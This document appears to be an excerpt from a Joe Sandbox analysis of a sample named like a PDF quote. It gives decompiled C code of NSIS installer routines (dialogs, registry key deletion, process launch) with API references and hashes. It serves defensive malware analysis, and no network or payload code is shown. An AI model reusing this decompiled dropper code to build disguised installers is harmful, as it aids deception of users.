                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CloseCreateValuelstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp
                • API String ID: 1356686001-891782240
                • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402BC5(intOrPtr _a4) {
                				char _v68;
                				long _t6;
                				struct HWND__* _t7;
                				struct HWND__* _t14;
                
                				if(_a4 != 0) {
                					_t14 =  *0x417044; // 0x0
                					if(_t14 != 0) {
                						_t14 = DestroyWindow(_t14);
                					}
                					 *0x417044 = 0;
                					return _t14;
                				}
                				__eflags =  *0x417044; // 0x0
                				if(__eflags != 0) {
                					return E00405DDC(0);
                				}
                				_t6 = GetTickCount();
                				__eflags = _t6 -  *0x423eac;
                				if(_t6 >  *0x423eac) {
                					__eflags =  *0x423ea8;
                					if( *0x423ea8 == 0) {
                						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                						 *0x417044 = _t7;
                						return _t7;
                					}
                					__eflags =  *0x423f54 & 0x00000001;
                					if(( *0x423f54 & 0x00000001) != 0) {
                						wsprintfA( &_v68, "... %d%%", E00402BA9());
                						return E00404E23(0,  &_v68);
                					}
                				}
                				return _t6;
                			}








                APIs
                • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                • GetTickCount.KERNEL32 ref: 00402BFB
                • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                  • Part of subcall function 00402BA9: MulDiv.KERNEL32(0003114D,00000064,00031E57), ref: 00402BBE
                • wsprintfA.USER32 ref: 00402C29
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                • String ID: ... %d%%
                • API String ID: 632923820-2449383134
                • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
                				void* _v8;
                				char _v272;
                				long _t18;
                				intOrPtr* _t27;
                				long _t28;
                
                				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
                				if(_t18 == 0) {
                					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                						if(_a12 != 0) {
                							RegCloseKey(_v8);
                							L8:
                							return 1;
                						}
                						if(E00402A28(_v8,  &_v272, 0) != 0) {
                							break;
                						}
                					}
                					RegCloseKey(_v8);
                					_t27 = E00405DA3(2);
                					if(_t27 == 0) {
                						if( *0x423f50 != 0) {
                							goto L8;
                						}
                						_t28 = RegDeleteKeyA(_a4, _a8);
                						if(_t28 != 0) {
                							goto L8;
                						}
                						return _t28;
                					}
                					return  *_t27(_a4, _a8,  *0x423f50, 0);
                				}
                				return _t18;
                			}









                APIs
                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Close$DeleteEnumOpen
                • String ID:
                • API String ID: 1912718029-0
                • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401CC1(int __edx) {
                				void* _t17;
                				struct HINSTANCE__* _t21;
                				struct HWND__* _t25;
                				void* _t27;
                
                				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                				GetClientRect(_t25, _t27 - 0x40);
                				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                				if(_t17 != _t21) {
                					DeleteObject(_t17);
                				}
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                				return 0;
                			}








                APIs
                • GetDlgItem.USER32 ref: 00401CC5
                • GetClientRect.USER32 ref: 00401CD2
                • LoadImageA.USER32 ref: 00401CF3
                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                • DeleteObject.GDI32(00000000), ref: 00401D10
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                				char _v36;
                				char _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t26;
                				void* _t34;
                				signed int _t36;
                				signed int _t39;
                				unsigned int _t46;
                
                				_t46 = _a12;
                				_push(0x14);
                				_pop(0);
                				_t34 = 0xffffffdc;
                				if(_t46 < 0x100000) {
                					_push(0xa);
                					_pop(0);
                					_t34 = 0xffffffdd;
                				}
                				if(_t46 < 0x400) {
                					_t34 = 0xffffffde;
                				}
                				if(_t46 < 0xffff3333) {
                					_t39 = 0x14;
                					asm("cdq");
                					_t46 = _t46 + 1 / _t39;
                				}
                				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                				_t21 = _t46 & 0x00ffffff;
                				_t36 = 0xa;
                				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                				_push(_t46 >> 0);
                				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                			}














                APIs
                • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                • wsprintfA.USER32 ref: 004046A6
                • SetDlgItemTextA.USER32 ref: 004046B9
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00401BAD() {
                				signed int _t28;
                				CHAR* _t31;
                				long _t32;
                				int _t37;
                				signed int _t38;
                				int _t42;
                				int _t48;
                				struct HWND__* _t52;
                				void* _t55;
                
                				 *(_t55 - 0x34) = E004029CB(3);
                				 *(_t55 + 8) = E004029CB(4);
                				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                				}
                				__eflags =  *(_t55 - 0x10) & 0x00000002;
                				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                					 *(_t55 + 8) = E004029E8(0x44);
                				}
                				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                				_push(1);
                				if(__eflags != 0) {
                					_t50 = E004029E8();
                					_t28 = E004029E8();
                					asm("sbb ecx, ecx");
                					asm("sbb eax, eax");
                					_t31 =  ~( *_t27) & _t50;
                					__eflags = _t31;
                					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                					goto L10;
                				} else {
                					_t52 = E004029CB();
                					_t37 = E004029CB();
                					_t48 =  *(_t55 - 0x10) >> 2;
                					if(__eflags == 0) {
                						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                						L10:
                						 *(_t55 - 8) = _t32;
                					} else {
                						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                						asm("sbb eax, eax");
                						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                					}
                				}
                				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                					_push( *(_t55 - 8));
                					E004059E3();
                				}
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                				return 0;
                			}













                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004052E5(CHAR* _a4) {
                				struct _PROCESS_INFORMATION _v20;
                				int _t7;
                
                				0x4224a0->cb = 0x44;
                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                				if(_t7 != 0) {
                					CloseHandle(_v20.hThread);
                					return _v20.hProcess;
                				}
                				return _t7;
                			}






                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                • CloseHandle.KERNEL32(?), ref: 00405317
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                • Error launching installer, xrefs: 004052F8
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                • API String ID: 3712363035-2984075973
                • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405578(CHAR* _a4) {
                				CHAR* _t7;
                
                				_t7 = _a4;
                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                					lstrcatA(_t7, 0x40900c);
                				}
                				return _t7;
                			}





                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-3916508600
                • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E00401EC5(char __ebx, char* __edi, char* __esi) {
                				char* _t18;
                				int _t19;
                				void* _t30;
                
                				_t18 = E004029E8(0xffffffee);
                				 *(_t30 - 0x2c) = _t18;
                				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                				 *__esi = __ebx;
                				 *(_t30 - 8) = _t19;
                				 *__edi = __ebx;
                				 *((intOrPtr*)(_t30 - 4)) = 1;
                				if(_t19 != __ebx) {
                					__eax = GlobalAlloc(0x40, __eax);
                					 *(__ebp + 8) = __eax;
                					if(__eax != __ebx) {
                						if(__eax != 0) {
                							__ebp - 0x44 = __ebp - 0x34;
                							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                							}
                						}
                						_push( *(__ebp + 8));
                						GlobalFree();
                					}
                				}
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                				return 0;
                			}







                APIs
                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                  • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                • String ID:
                • API String ID: 1404258612-0
                • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E00401D1B() {
                				void* __esi;
                				int _t6;
                				signed char _t11;
                				struct HFONT__* _t14;
                				void* _t18;
                				void* _t24;
                				void* _t26;
                				void* _t28;
                
                				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                				 *0x40af7c = E004029CB(3);
                				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                				 *0x40af83 = 1;
                				 *0x40af80 = _t11 & 0x00000001;
                				 *0x40af81 = _t11 & 0x00000002;
                				 *0x40af82 = _t11 & 0x00000004;
                				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                				_t14 = CreateFontIndirectA(0x40af6c);
                				_push(_t14);
                				_push(_t26);
                				E004059E3();
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                				return 0;
                			}












                APIs
                • GetDC.USER32(?), ref: 00401D22
                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CapsCreateDeviceFontIndirect
                • String ID:
                • API String ID: 3272661963-0
                • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403897(void* __ecx, void* __eflags) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed short _t6;
                				intOrPtr _t11;
                				signed int _t13;
                				signed int _t16;
                				signed short* _t18;
                				signed int _t20;
                				signed short* _t23;
                				intOrPtr _t25;
                				signed int _t26;
                				intOrPtr* _t27;
                
                				_t24 = "1033";
                				_t13 = 0xffff;
                				_t6 = E004059FC(__ecx, "1033");
                				while(1) {
                					_t26 =  *0x423ee4;
                					if(_t26 == 0) {
                						goto L7;
                					}
                					_t16 =  *( *0x423eb0 + 0x64);
                					_t20 =  ~_t16;
                					_t18 = _t16 * _t26 +  *0x423ee0;
                					while(1) {
                						_t18 = _t18 + _t20;
                						_t26 = _t26 - 1;
                						if((( *_t18 ^ _t6) & _t13) == 0) {
                							break;
                						}
                						if(_t26 != 0) {
                							continue;
                						}
                						goto L7;
                					}
                					 *0x423680 = _t18[1];
                					 *0x423f48 = _t18[3];
                					_t23 =  &(_t18[5]);
                					if(_t23 != 0) {
                						 *0x42367c = _t23;
                						E004059E3(_t24,  *_t18 & 0x0000ffff);
                						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
                						_t11 =  *0x423ecc;
                						_t27 =  *0x423ec8;
                						if(_t11 == 0) {
                							L15:
                							return _t11;
                						}
                						_t25 = _t11;
                						do {
                							_t11 =  *_t27;
                							if(_t11 != 0) {
                								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
                							}
                							_t27 = _t27 + 0x418;
                							_t25 = _t25 - 1;
                						} while (_t25 != 0);
                						goto L15;
                					}
                					L7:
                					if(_t13 != 0xffff) {
                						_t13 = 0;
                					} else {
                						_t13 = 0x3ff;
                					}
                				}
                			}

















                APIs
                • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: TextWindow
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                • API String ID: 530164218-1075807775
                • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                				long _t22;
                
                				if(_a8 != 0x102) {
                					if(_a8 != 0x200) {
                						_t22 = _a16;
                						L7:
                						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                							 *0x420480 = _t22;
                							E00405A85(0x420498, 0x424000);
                							E004059E3(0x424000, _t22);
                							E0040140B(6);
                							E00405A85(0x424000, 0x420498);
                						}
                						L11:
                						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                					}
                					if(IsWindowVisible(_a4) == 0) {
                						L10:
                						_t22 = _a16;
                						goto L11;
                					}
                					_t22 = E004046F2(_a4, 1);
                					_a8 = 0x419;
                					goto L7;
                				}
                				if(_a12 != 0x20) {
                					goto L10;
                				}
                				E00403E83(0x413);
                				return 0;
                			}





                APIs
                • IsWindowVisible.USER32 ref: 00404DA9
                • CallWindowProcA.USER32 ref: 00404E17
                  • Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
